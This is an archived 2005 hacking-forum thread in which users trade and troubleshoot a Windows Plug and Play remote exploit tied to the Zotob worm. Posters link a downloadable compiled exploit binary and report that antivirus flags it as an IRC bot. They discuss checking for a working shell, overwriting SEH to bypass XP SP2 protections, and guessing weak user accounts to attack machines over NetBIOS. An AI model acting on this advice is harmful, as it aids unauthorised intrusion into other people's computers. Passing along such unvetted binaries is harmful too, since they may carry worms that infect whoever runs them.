sry majestic but i think this thread will lead to one thing: the deletion of your account (at least that's what i pledge for...)
Skunky88
Aug 17 2005, 12:53 PM
i'm not sure about this but i think i found out something interesting..
if the exploits is frozen for a while after the advertise to check the shell the shell is working, if theres no waiting time thant it doesnt!
maybe i'm just crazy and should sleep now...
[eXPhase
Aug 17 2005, 01:49 PM
QUOTE(Skunky88 @ Aug 17 2005, 12:53 PM) i'm not sure about this but i think i found out something interesting.. if the exploits is frozen for a while after the advertise to check the shell the shell is working, if theres no waiting time thant it doesnt! maybe i'm just crazy and should sleep now... Its hangs indeed if the exploit did work
MilchKuh
Aug 17 2005, 05:43 PM
QUOTE(Hehe0815 @ Aug 17 2005, 10:59 AM) *lol* sry was little bit confuiesd, but didnt get error while compiling, changed like above http://web270.cyberwebserver-04.de/expl.exei downloaded this exploit and its 153 kb why so big? I compiled it by myself and it's only 61 kb and i didnt get any compiling error. and the exploit in the autohacker from apoc_neo is onyl 27 kb. can someone explain this oO? Cause i dont want to use the wrong exploit. so can give me someone a link to a real working one, who has already testet it? thx in advanced
nolimit
Aug 17 2005, 05:45 PM
QUOTE(Killaloop @ Aug 16 2005, 01:40 PM) QUOTE(nolimit @ Aug 16 2005, 10:20 AM) Well done. I forget, this is still usable in XP/2k3 with an established share right? Might be worthwhile to try for an OS independent exploit. Check the SEH placement across the OS's, it's not uncommon for them to shift this exploit uses SEH which is registered on XPSP2/2K3, you would need to rewrite it that it overwrites the complete SEH register. and for Win2k3 you would not only be authenticated, but also with an administrator account, which makes this quite useless First whats wrong with writing in something to overwrite the SEH in sp2. It takes 5 minutes,and could yield an OS independent exploit. the return is based in services.exe, so the SEH filter will let it through without question. Second while you need an admin account for authentication for 2003 just a regular account will suffice for XP. A regular user account is very easy to guess on a network, and are used very insecurely.
MpR
Aug 17 2005, 08:36 PM
QUOTE(nolimit @ Aug 17 2005, 05:45 PM) QUOTE(Killaloop @ Aug 16 2005, 01:40 PM) QUOTE(nolimit @ Aug 16 2005, 10:20 AM) Well done. I forget, this is still usable in XP/2k3 with an established share right? Might be worthwhile to try for an OS independent exploit. Check the SEH placement across the OS's, it's not uncommon for them to shift this exploit uses SEH which is registered on XPSP2/2K3, you would need to rewrite it that it overwrites the complete SEH register. and for Win2k3 you would not only be authenticated, but also with an administrator account, which makes this quite useless First whats wrong with writing in something to overwrite the SEH in sp2. It takes 5 minutes,and could yield an OS independent exploit. the return is based in services.exe, so the SEH filter will let it through without question. Second while you need an admin account for authentication for 2003 just a regular account will suffice for XP. A regular user account is very easy to guess on a network, and are used very insecurely. Well nolimit when I said I was going to bed this morning I didnt quite make it, at work atm with no sleep ... Well back to point if you login through netbios with a guest account and then smash services.exe it does the freak out no shell atm didnt get a chance to finish up with my playing but points there.. A lil zombied right now so forgive me if I make little to no sence. Theres a few probs though with implication in the wild, with a XP SP1 box running with no password or a weak password they shouldnt be online first off and prob a part of 500 kids botnet. Restict Anonymous seems to nuke this havent tested fully but think worked around. Im sure Im not going to spend much more time with this though but consept proven for whomever. How I made services crash was connecting to a network share before I smashed but theres a few more variables involved but meh Imma put my head down on my desk now and go to sleep for abit enjoy
Skunky88
Aug 18 2005, 01:23 PM
i wondered about the size of the compiled exploit, too! It was also found by ZoneAlarm AV as an ircbot? CODE
Aliases: [Win32.]Tpbot.A; [Win32.]Peabot.A; [Win32.]MS05-039!exploit; [W32/]IRCbot.worm!MS05-039 (McAfee); [Win32/]MS05-039!exploit!Worm; [W32.]Zotob.E (Symantec); [Net-Worm.]Win32.Small.d (Kaspersky); [WORM_]RBOT.CBQ (Trend); [W32/]Tpbot-A (Sophos);
Date Modified: 17-Aug-2005
Date Published: 16-Aug-2005
yeyo
Aug 18 2005, 02:05 PM
QUOTE(Skunky88 @ Aug 18 2005, 01:23 PM) i wondered about the size of the compiled exploit, too! It was also found by ZoneAlarm AV as an ircbot? CODE
Aliases: [Win32.]Tpbot.A; [Win32.]Peabot.A; [Win32.]MS05-039!exploit; [W32/]IRCbot.worm!MS05-039 (McAfee); [Win32/]MS05-039!exploit!Worm; [W32.]Zotob.E (Symantec); [Net-Worm.]Win32.Small.d (Kaspersky); [WORM_]RBOT.CBQ (Trend); [W32/]Tpbot-A (Sophos);
Date Modified: 17-Aug-2005
Date Published: 16-Aug-2005
If it foun it as an IRCBot I think that is normal, cuase MCAfee name it W32/IRCbot.worm!MS05-039 Aliases Name CME-540 W32.Zotob.E (Symantec) W32/Tpbot-A (Sophos) WORM_RBOT.CBQ (Trend) But my MCAfee detect it as Exploit-DcomRpc.gen ?¿?¿?¿?¿?¿?¿?¿?¿? with the las def file (4561) edit ---- from other thread QUOTE
this exploit is for pnp which is a service provided by rpc
soo ... it's god 
Hehe0815
Aug 18 2005, 02:32 PM
ur question bout the filesize, i compiled it again with the same .c file i took last time and this time i got the error internal file size mismatching, perhaps because of that my exe is bigger!
but theres no ircworm in it, dont panic!
would be silly spreading one around in a sec board......
think that it is detected, cause its a part of the Zotob....
-*maybe dcom cause ituses the same port?!*
Killaloop
Aug 18 2005, 02:46 PM
QUOTE(nolimit @ Aug 17 2005, 05:45 PM) First whats wrong with writing in something to overwrite the SEH in sp2. It takes 5 minutes,and could yield an OS independent exploit. the return is based in services.exe, so the SEH filter will let it through without question. Second while you need an admin account for authentication for 2003 just a regular account will suffice for XP. A regular user account is very easy to guess on a network, and are used very insecurely. I know, but since your first post sounded to me like "well just let collect offsets for xp and win2k3" I wanted to point out that only replacing the offsets would not do the trick for this operating systems and that exploiting win2k3 is not of any use because one needs admin account. Anyhow I have never written an exploit for 2k3 and xp sp2, if you say it easily done with this exploit, I'll keep it as this. Oh on a side note, as some talked about Administrator/user accounts with blank passwords, I was not able to connect remotely to my endpoints on winxp sp2 with an account that does not have a password set. could be that I did something wrong though.
MilchKuh
Aug 18 2005, 03:05 PM
Now i know why the compiled exploits have differend sizes...because they were compiled with differend compilers....
Mfg
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
|
|
